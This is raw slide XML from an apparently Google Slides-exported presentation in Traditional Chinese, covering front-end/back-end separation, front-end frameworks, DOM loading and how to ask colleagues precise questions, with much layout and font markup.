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4" roundtripDataSignature="AMtx7mi2lmkGkS9gTlaYHqWflCctpAnE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TW"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a:t>網站主機的角色很單純，只是要把第一次存取網址時的頁面傳送到終端裝置而已。</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="363639"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>相對來說，使用前端框架可以補足</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> UI 和資料間</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="363639"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>的連動議題</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="363639"/>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rPr lang="zh-TW" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="363639"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>前後端分離：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>以系統的觀點來看，當前後端分離後，我們可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>更容易地調節網站主機的花費</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>。根據前端程式和後端程式各</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>自的特性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>，將兩隻程式分別部署在不同類型的主機上，把錢用在刀口上。</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:srgbClr val="363639"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;14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24b9b62fb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24b9b62fb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f24b9b62fb_0_1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TW" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="363639"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>(6) 的 DOM 載入完成 (DOM ready)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;16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deaa02d45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deaa02d45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edeaa02d45_1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24b9b62fb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24b9b62fb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f24b9b62fb_0_1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12382bff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f12382bff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f12382bff4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4325" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="303233"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>你問前輩一個程式碼問題，因為你有觀念一直轉不過來？</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="303233"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-314325" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="303233"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>精準提問：我看了服務建議書裡面提到的時程是 8/10，但是看到你跟客戶對話的內容，時程卻改到了 8/5 ，想確認正確的時間是什麼時候？</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="303233"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Google Shape;7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24b9b62fb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gf24b9b62fb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4325" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="303233"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>你問前輩一個程式碼問題，因為你有觀念一直轉不過來？</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="303233"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-314325" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="303233"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>精準提問：我看了服務建議書裡面提到的時程是 8/10，但是看到你跟客戶對話的內容，時程卻改到了 8/5 ，想確認正確的時間是什麼時候？</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="303233"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Google Shape;81;gf24b9b62fb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24b9b62fb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f24b9b62fb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4325" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="303233"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>你問前輩一個程式碼問題，因為你有觀念一直轉不過來？</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="303233"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-314325" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="303233"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>精準提問：我看了服務建議書裡面提到的時程是 8/10，但是看到你跟客戶對話的內容，時程卻改到了 8/5 ，想確認正確的時間是什麼時候？</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="303233"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;gf24b9b62fb_0_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4b9b62fb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f24b9b62fb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4325" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="303233"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>你問前輩一個程式碼問題，因為你有觀念一直轉不過來？</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="303233"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-314325" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="303233"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>精準提問：我看了服務建議書裡面提到的時程是 8/10，但是看到你跟客戶對話的內容，時程卻改到了 8/5 ，想確認正確的時間是什麼時候？</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="303233"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;gf24b9b62fb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標題投影片">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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563888" y="4077072"/>
            <a:ext cx="4824240" cy="432048"/>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rgbClr val="545454"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="54545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3563888" y="4653136"/>
            <a:ext cx="4824240" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buNone/>
              <a:defRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;18;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="5985312"/>
            <a:ext cx="1908016" cy="252000"/>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260"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>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16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6660232" y="5985312"/>
            <a:ext cx="1728192" cy="252000"/>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260"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>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p:cSld name="含標題的內容">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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="493565"/>
            <a:ext cx="4104456" cy="28067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rgbClr val="597E39"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buNone/>
              <a:defRPr b="1" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="597E39"/>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17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="836712"/>
            <a:ext cx="4104457" cy="144016"/>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280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888889"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="14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17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="450204"/>
            <a:ext cx="720080" cy="530524"/>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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr b="0" i="1" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFil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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="1484784"/>
            <a:ext cx="6192689" cy="4248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錄">
  <p:cSld name="目錄">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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760" y="5345248"/>
            <a:ext cx="3528392" cy="28803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00"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411758" y="5642464"/>
            <a:ext cx="3528000" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="18000" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888889"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buNone/>
              <a:defRPr sz="13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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3284408" y="4418448"/>
            <a:ext cx="3528392" cy="28803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00"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
